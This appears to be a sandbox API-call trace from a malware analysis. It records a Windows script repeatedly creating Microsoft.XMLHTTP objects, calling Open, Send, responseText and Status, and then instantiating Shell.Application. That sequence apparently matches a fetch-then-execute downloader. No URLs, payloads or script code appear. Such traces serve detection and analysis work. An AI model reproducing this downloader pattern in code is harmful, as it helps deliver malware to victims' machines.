	[0271.450] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0271.453] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0271.453] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0271.453] SysStringLen (param_1=0x0) returned 0x0
	[0271.453] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0271.453] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0271.453] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0271.453] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0271.453] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0271.453] ??2@YAPEAX_K@Z () returned 0x62f310
	[0271.453] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0271.453] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0271.453] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0271.454] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0271.454] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0271.454] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0271.454] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0271.454] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0271.454] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0271.454] SysStringLen (param_1=0x0) returned 0x0
	[0271.454] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0271.454] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0271.454] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77a0) returned 0x0
	[0271.454] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0271.454] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0271.454] ??2@YAPEAX_K@Z () returned 0x62f330
	[0271.454] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0271.454] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0271.454] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0271.454] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77a0) returned 0x0
	[0271.455] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77a0) returned 0x3
	[0271.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0271.455] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0271.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0271.455] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0271.455] SysStringLen (param_1=0x0) returned 0x0
	[0271.455] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0271.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0271.455] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7800) returned 0x0
	[0271.455] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0271.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7800, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0271.455] ??2@YAPEAX_K@Z () returned 0x62f310
	[0271.455] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0271.455] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0271.455] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0271.455] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7800, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7800) returned 0x0
	[0271.455] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7800) returned 0x3
	[0271.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7800, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0271.456] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7800, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0271.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7800, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0271.456] longjmp () 
	[0271.456] longjmp () 
	[0271.456] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0271.456] SysStringLen (param_1=0x0) returned 0x0
	[0271.456] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0271.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0271.456] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0271.456] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0271.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0271.456] ??2@YAPEAX_K@Z () returned 0x62f330
	[0271.456] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0271.456] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0271.456] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0271.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0271.457] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0271.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0271.457] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0271.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0271.457] longjmp () 
	[0271.457] longjmp () 
	[0271.457] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0271.457] SysStringLen (param_1=0x0) returned 0x0
	[0271.457] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0271.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0271.457] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0271.457] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0271.457] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0271.457] ??2@YAPEAX_K@Z () returned 0x62f310
	[0271.457] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f310) 
	[0271.457] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0271.458] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0271.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0271.458] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0271.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0271.458] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0271.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0271.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0271.458] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0271.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0271.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0271.778] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0271.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0271.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0271.778] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0271.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0271.778] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0271.778] SysStringLen (param_1=0x0) returned 0x0
	[0271.778] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0271.779] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
